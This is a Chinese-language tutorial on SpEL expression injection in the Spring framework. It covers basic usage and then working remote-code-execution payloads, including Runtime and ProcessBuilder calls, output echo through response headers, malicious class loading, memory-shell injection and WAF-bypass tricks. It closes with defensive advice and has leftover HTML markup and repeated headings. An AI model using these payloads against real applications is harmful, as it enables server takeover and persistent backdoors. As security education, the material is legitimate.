Spring Expression Language (SpEL) 表达式注入安全研究<\/h1>

一、SpEL 概述<\/h2>
Spring Expression Language (SpEL) 是 Spring 框架提供的一种强大的表达式语言，用于在运行时查询和操作对象图。主要特点包括：<\/p>
支持方法调用和基本字符串模板功能<\/li>
支持访问数组、集合和索引器<\/li>
支持逻辑和算术运算<\/li>
支持命名变量和从 Spring 容器中检索 bean<\/li> <\/ul>
二、SpEL 基本用法<\/h2>

1. @Value 动态注入<\/h3>
@Component<\/span>
<\/span><\/span>public<\/span> class<\/span> ArithmeticService<\/span> {<\/span>
<\/span><\/span>    @Value<\/span>(<\/span>"#{10 + 20}"<\/span>)<\/span> 
<\/span><\/span>    private<\/span> int<\/span> sum;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Value<\/span>(<\/span>"#{30 - 15}"<\/span>)<\/span>
<\/span><\/span>    private<\/span> int<\/span> difference;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Value<\/span>(<\/span>"#{5 * 6}"<\/span>)<\/span>
<\/span><\/span>    private<\/span> int<\/span> product;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Value<\/span>(<\/span>"#{40 \/ 8}"<\/span>)<\/span>
<\/span><\/span>    private<\/span> int<\/span> quotient;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Value<\/span>(<\/span>"#{10 % 3}"<\/span>)<\/span>
<\/span><\/span>    private<\/span> int<\/span> remainder;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. XML 配置中使用<\/h3>
<bean<\/span> id=<\/span>"appConfig"<\/span> class=<\/span>"java.util.Properties"<\/span>><\/span>
<\/span><\/span>    <property<\/span> name=<\/span>"someProperty"<\/span> value=<\/span>"#{systemProperties['user.name']}"<\/span>\/><\/span>
<\/span><\/span><\/bean><\/span>
<\/span><\/span>
<\/span><\/span><bean<\/span> id=<\/span>"greetingService"<\/span> class=<\/span>"com.example.GreetingService"<\/span>><\/span>
<\/span><\/span>    <property<\/span> name=<\/span>"greetingMessage"<\/span> value=<\/span>"#{'Hello, ' + appConfig.someProperty}"<\/span>\/><\/span>
<\/span><\/span><\/bean><\/span>
<\/span><\/span><\/code><\/pre>3. 代码中使用<\/h3>
ExpressionParser parser =<\/span> new<\/span> SpelExpressionParser();<\/span>
<\/span><\/span>Expression expression =<\/span> parser.<\/span>parseExpression<\/span>(<\/span>"('Hello' + ' Al1ex').concat(#end)"<\/span>);<\/span>
<\/span><\/span>EvaluationContext context =<\/span> new<\/span> StandardEvaluationContext();<\/span>
<\/span><\/span>context.<\/span>setVariable<\/span>(<\/span>"end"<\/span>,<\/span> "!"<\/span>);<\/span>
<\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>expression.<\/span>getValue<\/span>(<\/span>context));<\/span>
<\/span><\/span><\/code><\/pre>三、SpEL 注入漏洞原理<\/h2>
当用户可以控制输入的表达式且能绕过黑名单限制时，可能导致远程代码执行(RCE)。漏洞核心在于：<\/p>

SpEL 表达式会被解析为 AST 语法树并计算每个节点<\/li>
SpEL 可以操作类及其方法<\/li>
使用 StandardEvaluationContext<\/code> 允许执行任意代码<\/li>
<\/ol>
四、漏洞利用方式<\/h2>
1. 基本利用方式<\/h3>
通过 java.lang.Runtime<\/h4>
String spel =<\/span> "T(java.lang.Runtime).getRuntime().exec(\"calc\")"<\/span>;<\/span>
<\/span><\/span>ExpressionParser parser =<\/span> new<\/span> SpelExpressionParser();<\/span>
<\/span><\/span>Expression expression =<\/span> parser.<\/span>parseExpression<\/span>(<\/span>spel);<\/span>
<\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>expression.<\/span>getValue<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>简化形式：<\/p>
String spel =<\/span> "T(Runtime).getRuntime().exec(\"calc\")"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>通过 java.lang.ProcessBuilder<\/h4>
String spel =<\/span> "new java.lang.ProcessBuilder(new String[]{\"calc\"}).start()"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>简化形式：<\/p>
String spel =<\/span> "new ProcessBuilder({'calc'}).start()"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>通过 javax.script.ScriptEngineManager<\/h4>
String spel =<\/span> "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\")"<\/span> +<\/span>
<\/span><\/span>              ".eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>2. 回显技术<\/h3>
使用 RequestContextHolder<\/h4>
T(<\/span>org.<\/span>springframework<\/span>.<\/span>util<\/span>.<\/span>StreamUtils<\/span>).<\/span>copy<\/span>(<\/span>
<\/span><\/span>    T(<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>).<\/span>newInstance<\/span>().<\/span>getEngineByName<\/span>(<\/span>"JavaScript"<\/span>)<\/span>
<\/span><\/span>        .<\/span>eval<\/span>(<\/span>T(<\/span>java.<\/span>net<\/span>.<\/span>URLDecoder<\/span>).<\/span>decode<\/span>(<\/span>"java.lang.Runtime.getRuntime().exec('cmd.exe \/c ipconfig').getInputStream()"<\/span>)),<\/span>
<\/span><\/span>    T(<\/span>org.<\/span>springframework<\/span>.<\/span>web<\/span>.<\/span>context<\/span>.<\/span>request<\/span>.<\/span>RequestContextHolder<\/span>).<\/span>currentRequestAttributes<\/span>()<\/span>
<\/span><\/span>        .<\/span>getResponse<\/span>().<\/span>getOutputStream<\/span>())<\/span>
<\/span><\/span><\/code><\/pre>添加响应头回显<\/h4>
T(<\/span>org.<\/span>springframework<\/span>.<\/span>web<\/span>.<\/span>context<\/span>.<\/span>request<\/span>.<\/span>RequestContextHolder<\/span>)<\/span>
<\/span><\/span>    .<\/span>getRequestAttributes<\/span>().<\/span>getResponse<\/span>().<\/span>addHeader<\/span>(<\/span>"Al1ex"<\/span>,<\/span> "success"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>命令执行结果回显<\/h4>
T(<\/span>org.<\/span>springframework<\/span>.<\/span>web<\/span>.<\/span>context<\/span>.<\/span>request<\/span>.<\/span>RequestContextHolder<\/span>)<\/span>
<\/span><\/span>    .<\/span>getRequestAttributes<\/span>().<\/span>getResponse<\/span>().<\/span>addHeader<\/span>(<\/span>
<\/span><\/span>        new<\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span>(<\/span>
<\/span><\/span>            new<\/span> java.<\/span>lang<\/span>.<\/span>ProcessBuilder<\/span>(<\/span>"ipconfig"<\/span>).<\/span>start<\/span>().<\/span>getInputStream<\/span>(),<\/span> 
<\/span><\/span>            "GBK"<\/span>).<\/span>useDelimiter<\/span>(<\/span>"al1ex"<\/span>).<\/span>next<\/span>(),<\/span> 
<\/span><\/span>        "true"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>3. 加载恶意类<\/h3>

编译恶意类：<\/li>
<\/ol>
public<\/span> class<\/span> al1ex<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"cmd.exe \/c calc.exe"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e){<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
Base64 编码 class 文件<\/li>
通过 SpEL 加载：<\/li>
<\/ol>
T(<\/span>org.<\/span>springframework<\/span>.<\/span>cglib<\/span>.<\/span>core<\/span>.<\/span>ReflectUtils<\/span>).<\/span>defineClass<\/span>(<\/span>
<\/span><\/span>    '<\/span>al1ex'<\/span>,<\/span> 
<\/span><\/span>    T(<\/span>com.<\/span>sun<\/span>.<\/span>org<\/span>.<\/span>apache<\/span>.<\/span>xml<\/span>.<\/span>internal<\/span>.<\/span>security<\/span>.<\/span>utils<\/span>.<\/span>Base64<\/span>).<\/span>decode<\/span>(<\/span>'<\/span>yv66vgAAADQ...<\/span>'<\/span>),<\/span>
<\/span><\/span>    T(<\/span>org.<\/span>springframework<\/span>.<\/span>util<\/span>.<\/span>ClassUtils<\/span>).<\/span>getDefaultClassLoader<\/span>())<\/span>
<\/span><\/span><\/code><\/pre>4. 内存马注入<\/h3>
使用 Evil 类注入内存马：<\/p>
T(<\/span>org.<\/span>springframework<\/span>.<\/span>cglib<\/span>.<\/span>core<\/span>.<\/span>ReflectUtils<\/span>).<\/span>defineClass<\/span>(<\/span>
<\/span><\/span>    '<\/span>Evil'<\/span>,<\/span> 
<\/span><\/span>    T(<\/span>org.<\/span>springframework<\/span>.<\/span>util<\/span>.<\/span>Base64Utils<\/span>).<\/span>decodeFromString<\/span>(<\/span>'<\/span>yv66vgAAADQBHQoATACSC...<\/span>'<\/span>),<\/span>
<\/span><\/span>    new<\/span> javax.<\/span>management<\/span>.<\/span>loading<\/span>.<\/span>MLet<\/span>(<\/span>new<\/span> java.<\/span>net<\/span>.<\/span>URL<\/span>[<\/span>0<\/span>],<\/span>
<\/span><\/span>    T(<\/span>java.<\/span>lang<\/span>.<\/span>Thread<\/span>).<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>()))<\/span>
<\/span><\/span><\/code><\/pre>五、WAF 绕过技术<\/h2>
1. 常用载荷<\/h3>
#<\/span>{<\/span>12<\/span>*<\/span>12<\/span>}<\/span>
<\/span><\/span>#<\/span>{<\/span>T(<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>).<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>)}<\/span>
<\/span><\/span>#<\/span>{<\/span>new<\/span> java.<\/span>lang<\/span>.<\/span>ProcessBuilder<\/span>(<\/span>'<\/span>cmd','<\/span>\/<\/span>c','<\/span>calc'<\/span>).<\/span>start<\/span>()}<\/span>
<\/span><\/span>#<\/span>{<\/span>T(<\/span>Thread).<\/span>sleep<\/span>(<\/span>10000<\/span>)}<\/span>
<\/span><\/span><\/code><\/pre>2. 反射调用绕过关键字过滤<\/h3>
T(<\/span>String).<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>"java.l"<\/span>+<\/span>"ang.Ru"<\/span>+<\/span>"ntime"<\/span>)<\/span>
<\/span><\/span>    .<\/span>getMethod<\/span>(<\/span>"ex"<\/span>+<\/span>"ec"<\/span>,<\/span>T(<\/span>String[]))<\/span>
<\/span><\/span>    .<\/span>invoke<\/span>(<\/span>
<\/span><\/span>        T(<\/span>String).<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>"java.l"<\/span>+<\/span>"ang.Ru"<\/span>+<\/span>"ntime"<\/span>)<\/span>
<\/span><\/span>            .<\/span>getMethod<\/span>(<\/span>"getRu"<\/span>+<\/span>"ntime"<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>),<\/span>
<\/span><\/span>        new<\/span> String[]{<\/span>"cmd"<\/span>,<\/span>"\/C"<\/span>,<\/span>"calc"<\/span>})<\/span>
<\/span><\/span><\/code><\/pre>3. 引号过滤绕过<\/h3>
T(<\/span>java.<\/span>lang<\/span>.<\/span>Character<\/span>).<\/span>toString<\/span>(<\/span>97<\/span>).<\/span>concat<\/span>(<\/span>T(<\/span>java.<\/span>lang<\/span>.<\/span>Character<\/span>).<\/span>toString<\/span>(<\/span>98<\/span>))<\/span>
<\/span><\/span><\/code><\/pre>六、防御措施<\/h2>

使用 SimpleEvaluationContext 替代 StandardEvaluationContext<\/strong><\/li>
<\/ol>
ExpressionParser parser =<\/span> new<\/span> SpelExpressionParser();<\/span>
<\/span><\/span>SimpleEvaluationContext context =<\/span> SimpleEvaluationContext.<\/span>forReadOnlyDataBinding<\/span>().<\/span>build<\/span>();<\/span>
<\/span><\/span>String spel =<\/span> "T(java.lang.Runtime).getRuntime().exec(\"calc\")"<\/span>;<\/span>
<\/span><\/span>Expression expression =<\/span> parser.<\/span>parseExpression<\/span>(<\/span>spel);<\/span>
<\/span><\/span>Integer result =<\/span> expression.<\/span>getValue<\/span>(<\/span>context,<\/span> Integer.<\/span>class<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
输入验证和过滤<\/li>
限制表达式解析权限<\/li>
使用沙箱环境执行表达式<\/li>
<\/ol>
七、参考链接<\/h2>

Spring Framework Documentation - SpEL<\/a><\/li>
Spring EvaluationContext Javadoc<\/a><\/li>
SpEL表达式注入漏洞学习<\/a><\/li>
<\/ol>
Spring Expression Language (SpEL) 表达式注入安全研究<\/h1>

二、SpEL 基本用法<\/h2>

四、漏洞利用方式<\/h2>

1. 基本利用方式<\/h3>

2. 回显技术<\/h3>

五、WAF 绕过技术<\/h2>

七、参考链接<\/h2> Spring Framework Documentation - SpEL<\/a><\/li> Spring EvaluationContext Javadoc<\/a><\/li> SpEL表达式注入漏洞学习<\/a><\/li> <\/ol>

七、参考链接<\/h2>

Spring Framework Documentation - SpEL<\/a><\/li>
Spring EvaluationContext Javadoc<\/a><\/li>
SpEL表达式注入漏洞学习<\/a><\/li> <\/ol>
